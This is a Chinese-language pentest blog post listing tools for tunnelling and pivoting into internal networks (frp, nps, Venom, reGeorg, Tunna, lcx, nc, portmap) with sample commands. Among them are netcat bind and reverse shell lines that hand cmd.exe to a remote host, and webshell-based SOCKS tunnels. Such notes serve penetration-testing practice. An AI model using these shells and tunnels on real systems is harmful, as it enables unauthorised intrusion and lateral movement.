自己对内网渗透搭建链路上很不熟练,乘着出差路上测试一下,有不当之处多多指正。好久不发文了,居然有付费阅读了,借此机会测试一下,内容比较粗糙,后期在全文发。相关工具在后台回复“01代理转发”可以获取下载链接。
内网穿透工具
frp
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
https://github.com/fatedier/frp
参考链接
https://sspai.com/post/52523
服务端
frps.exe -c frps.ini
客户端
frps.exe -c frpc.ini
[common]
server_addr = xxx
server_port = 7000
auth_token = {auth_token}
privilege_token = {privilege_token}
[http]
type = http
local_ip = 127.0.0.1
local_port = 80
[https]
type = https
local_ip = 127.0.0.1
local_port = 443
[ssh]
type = tcp
local_port = 22
remote_port = 5555
可以把22端口代理出去成为5555端口
nps
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
https://github.com/ehang-io/nps/blob/master/README_zh.md
代理工具
Termite
是EW(EarthWorm)的最新版,
官方链接:http://rootkiter.com/Termite/
其他的作用都很好就是起代理的时候没有测试成功,不知道为什么
Venom
https://github.com/Dliv3/Venom
这个比较好用
在本地
./admin_macos_x64 -lport 9999
在跳板机
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
然后在本地就可以socks代理
本地代理客户段可以使用
冰蝎(测试成功)
通过冰蝎的内网穿透功能可以起socks代理,测试成功。
reGeorg (测试成功)
工具地址:https://github.com/sensepost/reGeorg
reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
Tunna
https://github.com/SECFORCE/Tunna
一个很老的代理工具了,同样需要把文件上传到目标的web服务器上。
python proxy.py -u http://192.168.255.161/3.php -l 1234
需要目标服务器开启socket扩展。
转发工具
windows
lcx.exe(没有测试成功)
第一种用法:
1.1.1.1: lcx -listen 1111 2222
2.2.2.2: lcx -slave 1.1.1.1 1111 3.3.3.3 3389
然后,其他机器访问1.1.1.1的2222端口,就相当于访问了3.3.3.3的3389端口。
第二种用法:
1.1.1.1: lcx -tran 2222 2.2.2.2 3389
然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。
nc(测试成功)
第一种用法:正向连接
在内网主机(1.1.1.1)上执行
1.1.1.1 nc -l -p 4444 -t -e cmd.exe
公网主机(2.2.2.2)上远程连接
nc 1.1.1.1 4444
telnet 1.1.1.1 4444
第二种用法:反向连接
在公网主机(2.2.2.2)上监听端口:
2.2.2.2 nc -lvp 4444
在内网主机(1.1.1.1)上远程回连:
nc -t -e cmd.exe 公网主机ip 4444
linux
portmap
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
本文始发于微信公众号(无级安全):代理与转发常用工具汇总
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论